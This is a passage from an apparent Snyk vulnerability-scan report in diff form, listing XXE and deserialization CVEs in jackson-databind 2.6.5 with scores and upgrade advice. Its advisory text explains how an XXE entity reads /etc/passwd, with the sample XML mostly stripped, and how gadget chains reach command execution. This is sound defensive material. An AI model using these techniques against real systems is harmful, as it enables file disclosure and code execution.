"2024-03-11T09:49:41.313444Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": 
"2024-03-11T09:50:46.628614Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:51:14.249736Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.2, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:03:31.367594Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", - "assigner": "SUSE", - "severity": "medium", - "baseScore": 5.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:41.313444Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:46.628614Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:14.249736Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. A flaw was found in FasterXML Jackson Databind, where it does not have entity expansion secured properly in the `DOMDeserializer` class. The highest threat from this vulnerability is data integrity.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. 
By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.7, 2.10.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2589)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1887664)\n", - "epssDetails": { - "percentile": "0.68432", - "probability": "0.00275", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-25649" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-288c-cq4h-88gq" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-12-04T11:58:40.054903Z", - "functions_new": [ - { - "version": [ - "[2.6.0,2.6.7.4)", - "[2.9.0,2.9.10.7)", - "[2.10.0, 2.10.5.1)" - ], - 
"functionId": { - "className": "com.fasterxml.jackson.databind.ext.DOMSerializer", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-12-04T11:54:03Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-12-04T15:22:52Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:14.249736Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0.pr1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": 
"https://github.com/FasterXML/jackson-databind/issues/2986", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:38.926544Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:26.923105Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:42.491903Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.926544Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:26.923105Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. 
Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-35490" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-12-18T11:37:26.422837Z", - "functions_new": [ - { - "version": [ - "[,2.10.0.pr1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-12-18T11:32:48Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-12-18T16:33:11Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:26.923105Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": 
"SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0.pr1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2986", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:38.975620Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:57.453912Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:38.762302Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.975620Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": 
"2024-03-11T09:50:57.453912Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). 
These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-35491" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-12-18T11:40:53.658144Z", - "functions_new": [ - { - "version": [ - "[,2.10.0.pr1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-12-18T11:40:13Z", - "exploitDetails": { - "sources": [], - 
"maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-12-18T16:33:11Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:50:57.453912Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", - "credit": [ - "bu5yer" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2999", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Post" - }, - { - "url": 
"https://github.com/Al1ex/CVE-2020-35728", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:49:38.478896Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:01.576739Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.852735Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:43.478254Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:38.478896Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:01.576739Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.852735Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
It mishandles the interaction between serialization gadgets and typing, related to `com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool` (aka embedded Xalan in `org.glassfish.web/javax.servlet.jsp.jstl`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2999)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-35728)\n", - "epssDetails": { - "percentile": "0.80006", - "probability": "0.00674", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-35728" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-12-27T14:34:18.527699Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": 
"2020-12-27T14:05:38Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-12-27T17:34:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.852735Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1", - "title": "GitHub Commit" - }, - { - "url": 
"https://github.com/FasterXML/jackson-databind/issues/2997", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:01.748169Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.768509Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.093517Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:01.748169Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.768509Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36187" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T12:47:33.579319Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], 